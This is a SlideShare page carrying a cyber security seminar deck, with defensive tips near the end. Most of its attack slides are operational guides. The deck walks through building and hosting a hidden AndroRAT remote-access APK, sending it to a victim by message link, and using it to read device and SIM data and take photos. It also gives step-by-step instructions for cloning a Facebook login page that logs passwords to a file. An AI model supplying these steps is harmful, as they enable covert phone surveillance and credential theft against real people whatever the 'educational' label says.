SlideShare a Scribd company logo

Cyber_Security_Seminar_PPTs_to Upload.pptx

Download as PPTX, PDF
D
DrMajidMumtaz

This document contains a presentation on cyber security, ethical hacking, and penetration testing. It discusses various cyber threats like hacking, malware, and phishing. It then provides details on mobile hacking using AndroRAT to remotely control an Android phone. It also covers social media hacking techniques and how to conduct phishing attacks on sites like Facebook. The document concludes with a section on ransomware that demonstrates encrypting and decrypting files with a Python script.

Technology
1 of 48
Cyber Security / Ethical Hacking / Penetration Testing
Presentation Contents • Cyber Security /Ethical Hacking / Pen Testing • Threats: • Hacking • Malware • Phishing • Mobile Phone Hack • Attack Background • Android Hacking using AndroRAT • Practical Demonstration • Windows 10 Hack • Attack Background • Password Hack • Whole System Control • Practical Demonstration • Ransomware Attack • Background • Practical Demonstration • References
What is Cyber Security / Ethical hacking / penetration testing? Cyber Security: • It is related to characteristic of digital devices like computer, information technology, virtual reality, image processing, AI based automation solutions. • Security is the combination of Confidentiality, Integrity, Availability (CIA) triangle. Ethical Hacking • A set of high professional morals & principles. • Attempt to gain unauthorized access to a computer system, application or data. Penetration Testing • It is security exercise where a cyber-security expert attempts to find and exploit vulnerabilities in a digital equipment. • Like social media hacking, mobile hacking, Ransomware and others attacks.
01 ANALYSIS 02 LOGISTICS 03 PRODUCT 04 PROFIT 07 PLAN 06 PROCURE- MENT 08 MANAGE- MENT 05 DETERMINA- TION
Why and Who is doing hacking? • Financial (theft, fraud, blackmail) • Political /state (state level/ military) • Fame/ kudos (fun/ status) • Hacktivism (cause) • Pen testers (legal hacking) • Police/ FIA cyber crime division • Insider • Business
Mobile Hacking (Note : Only For Educational Purpose.) • Pre-requiste for Mobile Hacking: • Github installed • Python3 installed • Java installed • Local Machine (PC) IP address • Linux/Osx System
Mobile Hacking (Note : Only For Educational Purpose.) • Attack using AndroRAT: • A Tool used to control Android phone remotely • Client/Server application • Client-Side developed in Java language • Server is developed in Python • Windows/Linux/Osx System
Mobile Hacking (Note : Only For Educational Purpose.) • Step 1: Clone the repository from GitHub: • A following command should be used to clone the Git repository. Git clone https://github.com/karma9874/AndroRAT.git • Step 2: open the cloned repository in cmd/terminal cd <Directory_name> AndroRAT • Step 3: Installing necessary Libraries using PIP tool pip install –r requirements.txt
Mobile Hacking (Note : Only For Educational Purpose.) • Step 4: Building Malicious apk file for spying Cell phone: • A following command should be used to build the apk file. python3 androRAT.py - -build –i <your_IP_Address> -p 8089 –o <apk_name>.apk Find IP Address: Use ipconfig /all or ifconfig on cmd/terminal. • Step 5: Host the Listener as follows: python3 androRAT.py –shell –I 0.0.0.0 –p 8089 • Step 6: Open another terminal/cmd and run WebServer sudo apachectl start
Mobile Hacking (Note : Only For Educational Purpose.) • Send generated Android .apk file to Victim cell via email link, WhatsApp, SMS link etc. The victim will download it and install it as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • Send generated Android .apk file to Victim cell via appending/email link, WhatsApp, SMS link etc. The victim will download it and install it as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • On Hacker side the following shell will appear and wait for listening connection:
Mobile Hacking (Note : Only For Educational Purpose.) • When victim install apk on their cell the following screenshot shows that a connection established (IP address appears):
Mobile Hacking (Note : Only For Educational Purpose.) • When victim install apk on their cell the following screenshot shows that a connection established (IP address appears): write help will show the command to use victim cell data. The installed apk hide it, no icons can seen on the screen
Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo shows the device information as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo and camList shows the information as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo and camList shows the information as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo camList, takepic and vibrate shows as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo, camList, ip shows Output as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • The output of SIM information as follows:
Social Media Hack (Facebook, Twitter, Instagram etc.) • Background: Client/Server Architecture Clients Server 1. Client side Threats 2. Server side Threats 3. Network Threats
Social Media Hack (Facebook, Twitter, Instagram etc.) Email Spoofing & Phishing Attack • Uses a fake email address or simulates a genuine one in order to deceive user • Redirect user to webpage that looks like a social media page • Records the login information inputted, may attempt to download malware or perform XSS • According to Kapersky 1 in 5 Phishing Scams include Facebook Hacking FB Accounts Using Tabnapping.
Social Media Hack (Facebook, Twitter, Instagram etc.) • Domain Name System (DNS): In Simple World • DNS map the Host Name with IP address, There are 13-root name servers in the world. DNS are placed on different regions world-wide. Host name ping as follows:
Social Media Hack (Facebook, Twitter, Instagram etc.) • In Windows, the file will be located under C:WindowsSystem32driversetc.
Social Media Hack (Facebook, Twitter, Instagram etc.) • WireShark tool is used to capture packets. let's see the traffic on the packet level: We have an IP address of 192.168.10.19, which is the IP address of our attacker
Social Media Hack (Facebook, Twitter, Instagram etc.) • Facebook password phishing Step by Step Step 1: First, we need to set up a phishing page. first open your browser and navigate to the Facebook login page. Then, on the browser menu, click on File and then on Save page as.... Then, make sure that you choose a complete page from the drop-down menu. The output should be an .html file. Rename the Facebook HTML page index.html. Step 2: Inside this HTML, we have to change the login form. If you search for action=, you will see it. Here, we change the login form to redirect the request into a custom PHP page called login.php. Also, we have to change the request method to GET instead of POST.
Social Media Hack (Facebook, Twitter, Instagram etc.) • Facebook password phishing Step by Step Step 3: Next, we will create the passwords.txt file, where the target credentials will be stored. Step 4: Now, we will copy all of these files into varwww and start the Apache services. If we open the index.html page locally, we will see that this is the phishing page that the target will see. Open the browser and navigate to http://www.facebook.com/: Now, log into your Facebook account using your username and password. and jump on the folder and see if we get anything on the passwords.txt file.
Social Media Hack (Facebook, Twitter, Instagram etc.) • Countermeasures Securing the online account
Social Media Hack (Facebook, Twitter, Instagram etc.) • Countermeasures Securing the online account • Don’t click any links on an email unless you can guarantee who its from. • Use a trusted method of contacting the company via a phone number, app or website. • Mark the email as spam and contact the organisation.
Ransomware Attack Background • Normally loaded onto a computer via a download/attachment/link from an email or website. • Will either lock the screen or encrypt your data. • Once Ransomware is uploaded on your computer/tablet/phone it is very difficult to remove without removing all of the data • Wannacry attack 2017 - One of the biggest cyber attacks to occur. • Is said to have hit 300,000 computers in 150 countries. • Companies affected include; K-electric, Life insurance company, NHS, Renault, FedEx, Spanish telecoms and gas companies, German railways etc. An Hacker Encrypt your data and demand ransom in the form of Bitcoins to decrypt back.
Ransomware • More than a third of NHS trusts in England and Wales were affected with over 6,800 operations cancelled. The virus is spread through a vulnerability in the Windows OS known as “Eternal Blue,” .
Ransomware • More than a third of NHS trusts in England and Wales were affected with over 6,800 operations cancelled. The virus is spread through a vulnerability in the Windows OS known as “Eternal Blue,” .
Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows:
Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows:
Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows: Output after Encryption, the file inside the folder can’t be readable.
Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows: Output after decryption operation, the file inside the folder can be readable now.
Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows: Output after decryption operation, the file inside the folder can be readable again.
How to tackle Ransomware • Back up- Keep a backed up copy of your data. Ensure its not permanently connected to the network. • Patch- Keep your software up to date. Wannacry was successful as those affected computers hadn’t updated. The update contained a fix for the problem. • Attachments- Don’t click on links from emails/SMS as this could easily be from an untrusted source and contain malware like Ransomware
Public Wi-Fi • May not be trustworthy. They could share your information to other companies who operate in countries without any data protection. • You may not know who is watching you whilst you’re online. What to do and not do to • Don’t use online banking. Use your own data. • Don’t conduct any purchases • Use a virtual private network (VPN)
CYBER SECURITY Tips Tips for protecting yourself from cybersecurity threats in 2023: Password Policy Use strong passwords and change them regularly. Information Sharing vigilant Be careful about what information you share online. Firewall and Antivirus Install a firewall and antivirus software. Systems & software Keep your systems and software up to date. Unknown link and Attachments Don't click on links or open attachments from unknown senders. Data Backup Back up your data regularly. Lastly be aware of the latest cybersecurity threats.
Passwords Advice • Use 1 password per account. • Three random words use. Like Capitals, special characters and numbers is your own choice. • If you follow this advice your passwords security will be significantly increased against a brute force attack. • Password managers can be helpful to store your passwords.
Advice • In the physical world we’re good at protecting ourselves and our property, we need to replicate this in the digital world. • 80% of cyber-crime is preventable.
Advice • Update and migrate • Activate your firewall • Staff awareness • Data encryption • User accounts privileges i.e admin • Cyber insurance • Prepare Plan
You are the best defence! • Technology is only a small part of Cyber Defence • You are the most important person – protect yourself • For any businesses the most important and best defence is Cyber Security Aware employees – train your staff Always be aware! Always be on your guard! THANK YOU

Recommended

Hacking by Pratyush Gupta
Hacking by Pratyush GuptaHacking by Pratyush Gupta
Hacking by Pratyush Gupta
Tenet Systems Pvt Ltd
 
Hacking tutorial
Hacking tutorialHacking tutorial
Hacking tutorial
MSA Technosoft
 
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECTHACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
DHRUV562167
 
Computer Security Threats
Computer Security ThreatsComputer Security Threats
Computer Security Threats
Quick Heal Technologies Ltd.
 
ICT Security.pdf
ICT Security.pdfICT Security.pdf
ICT Security.pdf
JoeMarieDormido2
 
Hacking
HackingHacking
Hacking
rameswara reddy venkat
 
Hacking
HackingHacking
HackingRoshan Chaudhary
 
Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9
Geoff Pesimo
 

Recommended

Hacking by Pratyush Gupta
Hacking by Pratyush GuptaHacking by Pratyush Gupta
Hacking by Pratyush Gupta
Tenet Systems Pvt Ltd
 
Hacking tutorial
Hacking tutorialHacking tutorial
Hacking tutorial
MSA Technosoft
 
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECTHACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
DHRUV562167
 
Computer Security Threats
Computer Security ThreatsComputer Security Threats
Computer Security Threats
Quick Heal Technologies Ltd.
 
ICT Security.pdf
ICT Security.pdfICT Security.pdf
ICT Security.pdf
JoeMarieDormido2
 
Hacking
HackingHacking
Hacking
rameswara reddy venkat
 
Hacking
HackingHacking
HackingRoshan Chaudhary
 
Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9
Geoff Pesimo
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKING
NAWAZ KHAN
 
CS155 Computer Security at Stanford University
CS155 Computer Security at Stanford UniversityCS155 Computer Security at Stanford University
CS155 Computer Security at Stanford University
Rick Patterson
 
Ethical hacking is a based on computer hacking
Ethical hacking is a based on computer hackingEthical hacking is a based on computer hacking
Ethical hacking is a based on computer hacking
sxkkjbzq2k
 
31.ppt
31.ppt31.ppt
31.ppt
ssuserec53e73
 
31.ppt
31.ppt31.ppt
31.ppt
KarmanChandi
 
Cyber crime
Cyber crimeCyber crime
Cyber crime
Salma Zafar
 
hacking
hackinghacking
hacking
ADAIKKAPPANS1
 
computer_security.ppt
computer_security.pptcomputer_security.ppt
computer_security.ppt
Asif Raza
 
Hacking In Detail
Hacking In DetailHacking In Detail
Hacking In Detail
Greater Noida Institute Of Technology
 
Hacking By Nirmal
Hacking By NirmalHacking By Nirmal
Hacking By NirmalNIRMAL RAJ
 
Cyber security awareness presentation nepal
Cyber security awareness presentation nepalCyber security awareness presentation nepal
Cyber security awareness presentation nepal
ICT Frame Magazine Pvt. Ltd.
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
belsis
 
Cyber attacks 101
Cyber attacks 101Cyber attacks 101
Cyber attacks 101
Rafel Ivgi
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedfangjiafu
 
Hacking intro
Hacking introHacking intro
Hacking introMilind Mishra
 
Advanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementAdvanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security Management
Mayur Nanotkar
 
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
Avansa Mid- en Zuidwest
 
Hacking and Cyber Security.
Hacking and Cyber Security.Hacking and Cyber Security.
Hacking and Cyber Security.
Kalpesh Doru
 
Workshop on Cyber security and investigation
Workshop on Cyber security and investigationWorkshop on Cyber security and investigation
Workshop on Cyber security and investigation
Mehedi Hasan
 
Wfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security InnovationWfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security Innovation
Priyanka Aash
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
OnBoard
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 

More Related Content

Similar to Cyber_Security_Seminar_PPTs_to Upload.pptx

ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKING
NAWAZ KHAN
 
CS155 Computer Security at Stanford University
CS155 Computer Security at Stanford UniversityCS155 Computer Security at Stanford University
CS155 Computer Security at Stanford University
Rick Patterson
 
Ethical hacking is a based on computer hacking
Ethical hacking is a based on computer hackingEthical hacking is a based on computer hacking
Ethical hacking is a based on computer hacking
sxkkjbzq2k
 
31.ppt
31.ppt31.ppt
31.ppt
ssuserec53e73
 
31.ppt
31.ppt31.ppt
31.ppt
KarmanChandi
 
Cyber crime
Cyber crimeCyber crime
Cyber crime
Salma Zafar
 
hacking
hackinghacking
hacking
ADAIKKAPPANS1
 
computer_security.ppt
computer_security.pptcomputer_security.ppt
computer_security.ppt
Asif Raza
 
Hacking In Detail
Hacking In DetailHacking In Detail
Hacking In Detail
Greater Noida Institute Of Technology
 
Hacking By Nirmal
Hacking By NirmalHacking By Nirmal
Hacking By NirmalNIRMAL RAJ
 
Cyber security awareness presentation nepal
Cyber security awareness presentation nepalCyber security awareness presentation nepal
Cyber security awareness presentation nepal
ICT Frame Magazine Pvt. Ltd.
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
belsis
 
Cyber attacks 101
Cyber attacks 101Cyber attacks 101
Cyber attacks 101
Rafel Ivgi
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedfangjiafu
 
Advanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementAdvanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security Management
Mayur Nanotkar
 
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
Avansa Mid- en Zuidwest
 
Hacking and Cyber Security.
Hacking and Cyber Security.Hacking and Cyber Security.
Hacking and Cyber Security.
Kalpesh Doru
 
Workshop on Cyber security and investigation
Workshop on Cyber security and investigationWorkshop on Cyber security and investigation
Workshop on Cyber security and investigation
Mehedi Hasan
 
Wfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security InnovationWfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security Innovation
Priyanka Aash
 

Similar to Cyber_Security_Seminar_PPTs_to Upload.pptx (20)

ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKING
 
CS155 Computer Security at Stanford University
CS155 Computer Security at Stanford UniversityCS155 Computer Security at Stanford University
CS155 Computer Security at Stanford University
 
Ethical hacking is a based on computer hacking
Ethical hacking is a based on computer hackingEthical hacking is a based on computer hacking
Ethical hacking is a based on computer hacking
 
31.ppt
31.ppt31.ppt
31.ppt
 
31.ppt
31.ppt31.ppt
31.ppt
 
Cyber crime
Cyber crimeCyber crime
Cyber crime
 
hacking
hackinghacking
hacking
 
computer_security.ppt
computer_security.pptcomputer_security.ppt
computer_security.ppt
 
Hacking In Detail
Hacking In DetailHacking In Detail
Hacking In Detail
 
Hacking By Nirmal
Hacking By NirmalHacking By Nirmal
Hacking By Nirmal
 
Cyber security awareness presentation nepal
Cyber security awareness presentation nepalCyber security awareness presentation nepal
Cyber security awareness presentation nepal
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
 
Cyber attacks 101
Cyber attacks 101Cyber attacks 101
Cyber attacks 101
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
 
Hacking intro
Hacking introHacking intro
Hacking intro
 
Advanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementAdvanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security Management
 
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
 
Hacking and Cyber Security.
Hacking and Cyber Security.Hacking and Cyber Security.
Hacking and Cyber Security.
 
Workshop on Cyber security and investigation
Workshop on Cyber security and investigationWorkshop on Cyber security and investigation
Workshop on Cyber security and investigation
 
Wfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security InnovationWfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security Innovation
 

Recently uploaded

Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
OnBoard
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Jeffrey Haguewood
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Ramesh Iyer
 
Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical Futures
Bhaskar Mitra
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
Ralf Eggert
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
"Impact of front-end architecture on development cost", Viktor Turskyi
"Impact of front-end architecture on development cost", Viktor Turskyi"Impact of front-end architecture on development cost", Viktor Turskyi
"Impact of front-end architecture on development cost", Viktor Turskyi
Fwdays
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User Group
CatarinaPereira64715
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Product School
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
Elena Simperl
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
Paul Groth
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
DianaGray10
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
Product School
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 

Recently uploaded (20)

Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
 
Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical Futures
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
"Impact of front-end architecture on development cost", Viktor Turskyi
"Impact of front-end architecture on development cost", Viktor Turskyi"Impact of front-end architecture on development cost", Viktor Turskyi
"Impact of front-end architecture on development cost", Viktor Turskyi
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User Group
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 

Cyber_Security_Seminar_PPTs_to Upload.pptx

  • 1. Cyber Security / Ethical Hacking / Penetration Testing
  • 2. Presentation Contents • Cyber Security /Ethical Hacking / Pen Testing • Threats: • Hacking • Malware • Phishing • Mobile Phone Hack • Attack Background • Android Hacking using AndroRAT • Practical Demonstration • Windows 10 Hack • Attack Background • Password Hack • Whole System Control • Practical Demonstration • Ransomware Attack • Background • Practical Demonstration • References
  • 3. What is Cyber Security / Ethical hacking / penetration testing? Cyber Security: • It is related to characteristic of digital devices like computer, information technology, virtual reality, image processing, AI based automation solutions. • Security is the combination of Confidentiality, Integrity, Availability (CIA) triangle. Ethical Hacking • A set of high professional morals & principles. • Attempt to gain unauthorized access to a computer system, application or data. Penetration Testing • It is security exercise where a cyber-security expert attempts to find and exploit vulnerabilities in a digital equipment. • Like social media hacking, mobile hacking, Ransomware and others attacks.
  • 5. Why and Who is doing hacking? • Financial (theft, fraud, blackmail) • Political /state (state level/ military) • Fame/ kudos (fun/ status) • Hacktivism (cause) • Pen testers (legal hacking) • Police/ FIA cyber crime division • Insider • Business
